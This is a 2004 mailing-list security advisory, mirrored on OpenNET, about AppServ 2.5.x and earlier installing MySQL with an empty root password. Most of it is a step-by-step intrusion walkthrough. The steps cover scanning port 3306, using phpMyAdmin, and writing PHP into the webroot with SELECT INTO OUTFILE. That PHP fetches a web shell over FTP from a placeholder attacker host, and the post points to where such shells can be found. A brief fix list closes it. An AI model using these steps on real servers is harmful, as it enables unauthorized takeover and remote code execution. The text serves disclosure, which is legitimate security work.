The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


AppServ 2.5.x and Prior Exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 18 Nov 2004 16:18:15 -0000
From: saudi linux <ksa2ksa@yahoo.com.>
To: [email protected]
Subject: AppServ 2.5.x and Prior Exploit



what AppServ
==========
AppServ is the Apache/PHP/MySQL open source software installer packages. 

Objective : - Easy to buid Webserver and Database Server
- For those who just beginning client/server programming.
- For web programmers/developers using PHP & MySQL.
- For programming techniques that is easily to be ported to other platforms such as WindowZ
- Single step installation , no need to perform multiple step, time consuming installation and configuration.
- Ready-to-run just after you've finished installing.ready-to-run just after you've finished installing.
- If you hate and boring M$ IIS Webserver. 

AppServ URL:http://www.appservnetwork.com Vulnerability Ver: 2.5.X and prior problem :
the program comes in default user (Root) and empty password which let attacker to contrlor program and computer.
Expliot Method 1)scan tool (SuperScan or whatever) this step to scan MySQL service on port 3306 2)when we found a serveic (MySQL on 3306) we can Reguest the IP from IE (Internet Explorer). >From IE we can request the Machain IP like( http://xxx.xxx.xxx.xxx) 3)if we success the index page for AppServ open 4)Now we can edit the databases and tables in Mysql by phpmyadmin >From IE (http://xxx.xxx.xxx.xxx/PhpMyAdmin) 5)default MySQL Server come with two database (test,mysql),our target is (mysql ). Now we can add new table contains our exploit - Create New table for example (exploit) with one fild and type TEXT -insert in database the exploit ( PHP code) like : ==============start================= <? $conn_id = ftp_connect("Evil_IP_or_Attacker_ip"); $login_result = ftp_login($conn_id, "Attacker", "Passwd"); $download = ftp_get($conn_id, "C:\AppServ\www\phpShell.php", "phpshell.php", FTP_BINARY); ftp_quit($conn_id); ?> ==============end===================== the attacker could use " Windows FTP Server" or any FTP daemon, it's not a matter :-) phpshell.php is a script function like (system,passthru,exec ...etc) you can find nice phpshell here (http://phpfm.sf.net ) the attacker could download EXE file else. 6)Now we are able to make a query to outfile by use INTO OUTFILE statement . SELECT * From exploit INTO OUTFILE 'C:\\AppServ\\www\\Query.php' 7)Query.php contain Our PHP code 8)if we success we can reguest (http://xxx.xxx.xxx.xxx/Query.php) 9)if FTP connection successful and downloaded phpshell.php in the victim PC you can send new request like: (http://xxx.xxx.xxx.xxx/phpshell.php) 10) Game's Over
Fix ===== 1)change Root passowrd 2)use firewall for aptche and MySQL Server 3)use Save Mode for your script
discovered by Saudi Linux

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру